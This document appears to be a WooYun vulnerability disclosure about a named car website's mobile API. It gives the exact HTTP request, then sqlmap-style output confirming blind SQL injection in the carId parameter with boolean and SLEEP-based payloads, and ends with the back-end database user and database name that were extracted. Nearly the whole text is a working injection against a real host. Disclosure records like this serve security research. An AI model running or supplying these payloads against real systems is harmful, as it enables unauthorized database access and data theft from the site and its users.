WooYun.org

POST /auto/index.php?r=service/IphoneApi/GetCarDetailsNewById HTTP/1.1
Host: newcar.xcar.com.cn
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Accept-Language: zh-cn
Accept: */*
Connection: keep-alive
User-Agent: XCAR/4.5.4 CFNetwork/672.0.8 Darwin/14.0.0
carId=12566

Place: POST
Parameter: carId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: carId=12566 AND 2396=2396
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: carId=12566 AND SLEEP(5)
---
[16:49:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[16:49:57] [INFO] fetching current user
[16:49:57] [INFO] retrieved:
gcardbmanage@%.xcar.com.cn
current user:    'gcardbmanage@%.xcar.com.cn'
[16:50:44] [INFO] fetching current database
[16:50:44] [INFO] retrieved: gocar
current database:    'gocar'